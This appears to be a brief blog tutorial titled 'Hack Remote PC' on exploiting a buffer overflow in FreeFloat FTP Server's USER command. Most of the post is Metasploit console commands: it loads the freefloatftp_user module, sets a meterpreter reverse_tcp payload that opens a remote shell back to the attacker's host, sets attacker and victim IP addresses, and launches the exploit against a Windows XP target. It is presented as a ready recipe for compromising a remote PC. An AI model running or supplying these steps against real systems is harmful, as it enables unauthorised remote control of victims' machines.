Hack Remote PC using Free Float FTP Server USER Command Buffer Overflow

Freefloat FTP Server is prone to an overflow condition. It fails to properly sanitize user-supplied input resulting in a stack-based buffer overflow. With a specially crafted 'USER' command, a remote attacker can potentially have an unspecified impact.

Exploit Targets
FreeFloat FTP Server

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type use exploit/windows/ftp/freefloatftp_user
msf exploit (freefloatftp_user)>set payload windows/meterpreter/reverse_tcp
msf exploit (freefloatftp_user)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (freefloatftp_user)>set rhost 192.168.0.110 (IP Address of Victim PC)
msf exploit (freefloatftp_user)>exploit  


0 comments:

Post a Comment